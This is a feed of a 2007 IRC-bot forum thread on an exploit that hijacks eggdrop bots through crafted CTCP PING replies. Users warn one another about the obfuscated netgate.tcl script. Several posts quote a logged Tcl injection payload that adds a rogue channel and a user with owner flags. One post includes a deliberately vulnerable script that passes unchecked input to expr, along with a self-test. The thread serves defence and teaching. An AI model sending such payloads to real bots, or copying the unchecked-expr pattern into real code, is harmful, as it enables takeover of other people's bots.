<?xml version="1.0" encoding="UTF-8"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en-gb">
	<link rel="self" type="application/atom+xml" href="https://forum.eggheads.org/app.php/feed/topic/13263" />

	<title>egghelp/eggheads community</title>
	<subtitle>Discussion of eggdrop bots, shell accounts and tcl scripts.</subtitle>
	<link href="https://forum.eggheads.org/index.php" />
	<updated>2007-03-22T19:29:40-04:00</updated>

	<author><name><![CDATA[egghelp/eggheads community]]></name></author>
	<id>https://forum.eggheads.org/app.php/feed/topic/13263</id>

		<entry>
		<author><name><![CDATA[Alchera]]></name></author>
		<updated>2007-03-22T19:29:40-04:00</updated>

		<published>2007-03-22T19:29:40-04:00</published>
		<id>https://forum.eggheads.org/viewtopic.php?p=71495#p71495</id>
		<link href="https://forum.eggheads.org/viewtopic.php?p=71495#p71495"/>
		<title type="html"><![CDATA[Exploiting eggdrops through CTCP PING]]></title>

		
		<content type="html" xml:base="https://forum.eggheads.org/viewtopic.php?p=71495#p71495"><![CDATA[
<blockquote class="uncited"><div>don't use netgate.tcl - <a href="http://forum.egghelp.org/viewtopic.php?t=6708#43430" class="postlink">http://forum.egghelp.org/viewtopic.php?t=6708#43430</a></div></blockquote>After all the posts here (and the fact I alerted all the founders of the appropriate channels on DALnet) I am amazed that people still get hold of it.<p>Statistics: Posted by <a href="https://forum.eggheads.org/memberlist.php?mode=viewprofile&amp;u=3646">Alchera</a> — Thu Mar 22, 2007 7:29 pm</p><hr />
]]></content>
	</entry>
		<entry>
		<author><name><![CDATA[nml375]]></name></author>
		<updated>2007-03-22T12:15:23-04:00</updated>

		<published>2007-03-22T12:15:23-04:00</published>
		<id>https://forum.eggheads.org/viewtopic.php?p=71476#p71476</id>
		<link href="https://forum.eggheads.org/viewtopic.php?p=71476#p71476"/>
		<title type="html"><![CDATA[Exploiting eggdrops through CTCP PING]]></title>

		
		<content type="html" xml:base="https://forum.eggheads.org/viewtopic.php?p=71476#p71476"><![CDATA[
Guess my gut-feeling was right then..<br>Reading that thread, ctcp-backdoor is the least of your problems with that script...<p>Statistics: Posted by <a href="https://forum.eggheads.org/memberlist.php?mode=viewprofile&amp;u=8052">nml375</a> — Thu Mar 22, 2007 12:15 pm</p><hr />
]]></content>
	</entry>
		<entry>
		<author><name><![CDATA[user]]></name></author>
		<updated>2007-03-22T11:16:23-04:00</updated>

		<published>2007-03-22T11:16:23-04:00</published>
		<id>https://forum.eggheads.org/viewtopic.php?p=71473#p71473</id>
		<link href="https://forum.eggheads.org/viewtopic.php?p=71473#p71473"/>
		<title type="html"><![CDATA[Exploiting eggdrops through CTCP PING]]></title>

		
		<content type="html" xml:base="https://forum.eggheads.org/viewtopic.php?p=71473#p71473"><![CDATA[
don't use netgate.tcl - <a href="http://forum.egghelp.org/viewtopic.php?t=6708#43430" class="postlink">http://forum.egghelp.org/viewtopic.php?t=6708#43430</a><p>Statistics: Posted by <a href="https://forum.eggheads.org/memberlist.php?mode=viewprofile&amp;u=2878">user</a> — Thu Mar 22, 2007 11:16 am</p><hr />
]]></content>
	</entry>
		<entry>
		<author><name><![CDATA[nml375]]></name></author>
		<updated>2007-03-22T10:55:28-04:00</updated>

		<published>2007-03-22T10:55:28-04:00</published>
		<id>https://forum.eggheads.org/viewtopic.php?p=71472#p71472</id>
		<link href="https://forum.eggheads.org/viewtopic.php?p=71472#p71472"/>
		<title type="html"><![CDATA[Exploiting eggdrops through CTCP PING]]></title>

		
		<content type="html" xml:base="https://forum.eggheads.org/viewtopic.php?p=71472#p71472"><![CDATA[
Never heard of that script before, but bothered to search and dl 9.1..<br>And to be honest, any script that puts such efforts in making it hard to read/search for keywords/etc really makes me really wonder how many nasties are hidden in there.<br>Besides, I really don't see any other point in all that "encryption" (other than hiding trojans, etc), as most of it would be decrypted once loaded. Run it in a sandbox and you'd have most of it decoded.<br>Nice alert tho, Zexel.<p>Statistics: Posted by <a href="https://forum.eggheads.org/memberlist.php?mode=viewprofile&amp;u=8052">nml375</a> — Thu Mar 22, 2007 10:55 am</p><hr />
]]></content>
	</entry>
		<entry>
		<author><name><![CDATA[ZEXEL]]></name></author>
		<updated>2007-03-22T10:38:25-04:00</updated>

		<published>2007-03-22T10:38:25-04:00</published>
		<id>https://forum.eggheads.org/viewtopic.php?p=71471#p71471</id>
		<link href="https://forum.eggheads.org/viewtopic.php?p=71471#p71471"/>
		<title type="html"><![CDATA[worst!]]></title>

		
		<content type="html" xml:base="https://forum.eggheads.org/viewtopic.php?p=71471#p71471"><![CDATA[
<blockquote class="uncited"><div>(Eggbot) [03:04] CTCP PING: 1111305817 from TezDhaar (<a href="mailto:Scorpioon@BaCk.To.DarkneS.Us">Scorpioon@BaCk.To.DarkneS.Us</a>)<br>(Eggbot) [03:04] CTCP reply PING: [set notc "TCL";channel add #hackers_group;savechan;adduser TezDhaar TezDhaar*!*@*;chattr TezDhaar "fhjlmnoptxQZ";channel add #hackers_group;savechan;adduser TezDhaar TezDhaar*!*@*;chattr TezDhaar "fhjlmnoptxQZ";channel add #hackers_group;savechan] from TezDhaar (<a href="mailto:Scorpioon@BaCk.To.DarkneS.Us">Scorpioon@BaCk.To.DarkneS.Us</a>) to Eggbot</div></blockquote>That's request CTCP PING exploit would be work with NETGATE tcl version 9.x before and the all of the variants, please disable any CTCP PING request if you use that tcl! It can be effect of taking over fully the bot from your hand!<br><br>Please, becareful and disable any trigger CTCP PING request inside NETGATE tcl. <img class="smilies" src="https://forum.eggheads.org/images/smilies/icon_wink.gif" width="15" height="15" alt=":wink:" title="Wink"><br>Thank you...<p>Statistics: Posted by <a href="https://forum.eggheads.org/memberlist.php?mode=viewprofile&amp;u=7909">ZEXEL</a> — Thu Mar 22, 2007 10:38 am</p><hr />
]]></content>
	</entry>
		<entry>
		<author><name><![CDATA[Sir_Fz]]></name></author>
		<updated>2007-03-21T21:19:03-04:00</updated>

		<published>2007-03-21T21:19:03-04:00</published>
		<id>https://forum.eggheads.org/viewtopic.php?p=71459#p71459</id>
		<link href="https://forum.eggheads.org/viewtopic.php?p=71459#p71459"/>
		<title type="html"><![CDATA[Exploiting eggdrops through CTCP PING]]></title>

		
		<content type="html" xml:base="https://forum.eggheads.org/viewtopic.php?p=71459#p71459"><![CDATA[
<blockquote class="uncited"><div>(Eggbot) [03:04] CTCP PING: 1111305817 from TezDhaar (<a href="mailto:Scorpioon@BaCk.To.DarkneS.Us">Scorpioon@BaCk.To.DarkneS.Us</a>)<br>(Eggbot) [03:04] CTCP reply PING: [set notc "TCL";channel add #hackers_group;savechan;adduser TezDhaar TezDhaar*!*@*;chattr TezDhaar "fhjlmnoptxQZ";channel add #hackers_group;savechan;adduser TezDhaar TezDhaar*!*@*;chattr TezDhaar "fhjlmnoptxQZ";channel add #hackers_group;savechan] from TezDhaar (<a href="mailto:Scorpioon@BaCk.To.DarkneS.Us">Scorpioon@BaCk.To.DarkneS.Us</a>) to Eggbot</div></blockquote>Now that's just lame, he adds his handle and channel three times lol <img class="smilies" src="https://forum.eggheads.org/images/smilies/icon_lol.gif" width="15" height="15" alt=":lol:" title="Laughing"> maybe to be sure? or just a "good" luck thingie <img class="smilies" src="https://forum.eggheads.org/images/smilies/icon_rolleyes.gif" width="15" height="15" alt=":roll:" title="Rolling Eyes"> <img class="smilies" src="https://forum.eggheads.org/images/smilies/icon_razz.gif" width="15" height="15" alt=":P" title="Razz"><br><br>You could've simply checked if that handle and channel have been added to your bot after it received this CTCP reply and told us whether it's effecting your bot or not <img class="smilies" src="https://forum.eggheads.org/images/smilies/icon_wink.gif" width="15" height="15" alt=";)" title="Wink"><br><br>I'd go with nml375's advice on this (great example). Check out "<a href="http://forum.egghelp.org/viewtopic.php?t=9945" class="postlink">Script security</a>" from the FAQ forum.<p>Statistics: Posted by <a href="https://forum.eggheads.org/memberlist.php?mode=viewprofile&amp;u=3085">Sir_Fz</a> — Wed Mar 21, 2007 9:19 pm</p><hr />
]]></content>
	</entry>
		<entry>
		<author><name><![CDATA[ap]]></name></author>
		<updated>2007-03-21T21:12:36-04:00</updated>

		<published>2007-03-21T21:12:36-04:00</published>
		<id>https://forum.eggheads.org/viewtopic.php?p=71458#p71458</id>
		<link href="https://forum.eggheads.org/viewtopic.php?p=71458#p71458"/>
		<title type="html"><![CDATA[Exploiting eggdrops through CTCP PING]]></title>

		
		<content type="html" xml:base="https://forum.eggheads.org/viewtopic.php?p=71458#p71458"><![CDATA[
ops, thank you<p>Statistics: Posted by <a href="https://forum.eggheads.org/memberlist.php?mode=viewprofile&amp;u=7851">ap</a> — Wed Mar 21, 2007 9:12 pm</p><hr />
]]></content>
	</entry>
		<entry>
		<author><name><![CDATA[rosc2112]]></name></author>
		<updated>2007-03-21T00:40:46-04:00</updated>

		<published>2007-03-21T00:40:46-04:00</published>
		<id>https://forum.eggheads.org/viewtopic.php?p=71439#p71439</id>
		<link href="https://forum.eggheads.org/viewtopic.php?p=71439#p71439"/>
		<title type="html"><![CDATA[Exploiting eggdrops through CTCP PING]]></title>

		
		<content type="html" xml:base="https://forum.eggheads.org/viewtopic.php?p=71439#p71439"><![CDATA[
<blockquote class="uncited"><div>bind dcc n testping check_ping_vulnerability</div></blockquote>So, in the dcc connection to your bot, testping<p>Statistics: Posted by <a href="https://forum.eggheads.org/memberlist.php?mode=viewprofile&amp;u=7395">rosc2112</a> — Wed Mar 21, 2007 12:40 am</p><hr />
]]></content>
	</entry>
		<entry>
		<author><name><![CDATA[ap]]></name></author>
		<updated>2007-03-20T22:35:57-04:00</updated>

		<published>2007-03-20T22:35:57-04:00</published>
		<id>https://forum.eggheads.org/viewtopic.php?p=71434#p71434</id>
		<link href="https://forum.eggheads.org/viewtopic.php?p=71434#p71434"/>
		<title type="html"><![CDATA[Exploiting eggdrops through CTCP PING]]></title>

		
		<content type="html" xml:base="https://forum.eggheads.org/viewtopic.php?p=71434#p71434"><![CDATA[
thanks nml375,<br>So how would we test this? /ctcp nick ping or /ping nick<br><br>thanks<p>Statistics: Posted by <a href="https://forum.eggheads.org/memberlist.php?mode=viewprofile&amp;u=7851">ap</a> — Tue Mar 20, 2007 10:35 pm</p><hr />
]]></content>
	</entry>
		<entry>
		<author><name><![CDATA[nml375]]></name></author>
		<updated>2007-03-20T09:40:00-04:00</updated>

		<published>2007-03-20T09:40:00-04:00</published>
		<id>https://forum.eggheads.org/viewtopic.php?p=71414#p71414</id>
		<link href="https://forum.eggheads.org/viewtopic.php?p=71414#p71414"/>
		<title type="html"><![CDATA[Exploiting eggdrops through CTCP PING]]></title>

		
		<content type="html" xml:base="https://forum.eggheads.org/viewtopic.php?p=71414#p71414"><![CDATA[
<strong class="text-strong">IF</strong> you've got a very poorly written "ctcp ping reply" script loaded, sure this might work.<br>However, plain vanilla eggdrops does not have any bindings to ctcr, and the only "raw" processing of ctcp-replys are in the irc- and server-module, which only identifies a notice to be a ctcp-reply and just logs the whole message.<br><br>How to identify a poor script? Here's an example:<div class="codebox"><p>Code: </p><pre><code>die "Do NOT run this script!!!"proc do_ping {hand idx text} {  puthelp "PRIVMSG $text :\001PING [unixtime]\001"}proc got_ping_reply {nick host hand target what time} {  putlog "Ping reply from $nick: [expr [unixtime] - $time] seconds."}bind dcc - buggedping do_pingbind ctcr - PING got_ping_reply</code></pre></div>So what's so terribly wrong with this?<br>Well, this script trusts that the ping reply is "proper", that is, it returns the same timestamp that I first sent to the other client. However, a client may put whatever they wish as "timestamp", including an arbitrary string that may include nasty stuffs. But being unthoughtful, this script trusts it to be a simple integer that I can subtract from current time (now - timestamp), so I pass it unchecked to "expr". "expr" however will evaluate anything inbetween [] as tcl-code to be interpreted, and voila, the exploit you posted would work as a charm.<br><br>Lesson learned? <strong class="text-strong">NEVER EVER</strong> use expr with unchecked input from any untrusted source.<br><br><em class="text-italics">edit:</em><br>If you are worried wether your system is vulnerable to this, use this little script to check:<div class="codebox"><p>Code: </p><pre><code>proc check_ping_vulnerability {handle idx text} {  puthelp "NOTICE $::botnick :\001PING \[putlog \"Your bot suffers from a ctcp-pingreply remote exploit. Please check your loaded scripts.\"\]\001"}bind dcc n testping check_ping_vulnerability</code></pre></div>Note, the following logentry would be recieved on safe bots aswell:<blockquote class="uncited"><div>[14:58] CTCP reply PING: [putlog "Your bot suffers from a ctcp-pingreply remote exploit. Please check your loaded scripts."] from botnick (ident@host) to botnick</div></blockquote>However, you are in trouble if you find this in your logs as a single logentry:<blockquote class="uncited"><div>Your bot suffers from a ctcp-pingreply remote exploit. Please check your loaded scripts.</div></blockquote><p>Statistics: Posted by <a href="https://forum.eggheads.org/memberlist.php?mode=viewprofile&amp;u=8052">nml375</a> — Tue Mar 20, 2007 9:40 am</p><hr />
]]></content>
	</entry>
		<entry>
		<author><name><![CDATA[awyeah]]></name></author>
		<updated>2007-03-20T04:17:34-04:00</updated>

		<published>2007-03-20T04:17:34-04:00</published>
		<id>https://forum.eggheads.org/viewtopic.php?p=71408#p71408</id>
		<link href="https://forum.eggheads.org/viewtopic.php?p=71408#p71408"/>
		<title type="html"><![CDATA[Exploiting eggdrops through CTCP PING]]></title>

		
		<content type="html" xml:base="https://forum.eggheads.org/viewtopic.php?p=71408#p71408"><![CDATA[
I've got a friend on a channel on DALnet, he told me this today, just wondering if this is really possible:<br><blockquote class="uncited"><div>&lt;tux&gt; If you've got a channel kick script, you might add #hackers_group to it, and the ident *!Scorpioon@* to banlists.. lamers in there going around trying to exploit eggdrops.</div></blockquote>CTCP sent to his bot and CTCR reply returned:<blockquote class="uncited"><div>(Eggbot) [03:04] CTCP PING: 1111305817 from TezDhaar (<a href="mailto:Scorpioon@BaCk.To.DarkneS.Us">Scorpioon@BaCk.To.DarkneS.Us</a>)<br>(Eggbot) [03:04] CTCP reply PING: [set notc "TCL";channel add #hackers_group;savechan;adduser TezDhaar TezDhaar*!*@*;chattr TezDhaar "fhjlmnoptxQZ";channel add #hackers_group;savechan;adduser TezDhaar TezDhaar*!*@*;chattr TezDhaar "fhjlmnoptxQZ";channel add #hackers_group;savechan] from TezDhaar (<a href="mailto:Scorpioon@BaCk.To.DarkneS.Us">Scorpioon@BaCk.To.DarkneS.Us</a>) to Eggbot</div></blockquote><p>Statistics: Posted by <a href="https://forum.eggheads.org/memberlist.php?mode=viewprofile&amp;u=4875">awyeah</a> — Tue Mar 20, 2007 4:17 am</p><hr />
]]></content>
	</entry>
	</feed>
